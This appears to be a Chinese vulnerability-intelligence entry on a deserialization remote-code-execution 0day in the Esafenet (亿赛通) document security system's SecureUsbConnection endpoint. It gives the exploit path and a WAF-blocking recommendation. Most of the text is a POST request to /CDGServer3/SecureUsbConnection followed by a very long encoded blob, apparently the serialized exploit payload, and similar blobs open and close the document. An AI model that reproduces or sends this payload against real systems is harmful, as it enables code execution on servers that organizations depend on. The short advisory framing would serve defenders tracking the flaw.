EJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
亿赛通电子文档安全管理系统SecureUsbConnection存在反序列化漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/CDGServer3/SecureUsbConnection?command=GETSYSTEMINFO |
WAF封禁路路径,等待发布补丁 |
812 |
0day |
漏洞详情
POST /CDGServer3/SecureUsbConnection?command=GETSYSTEMINFO HTTP/1.1
NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAO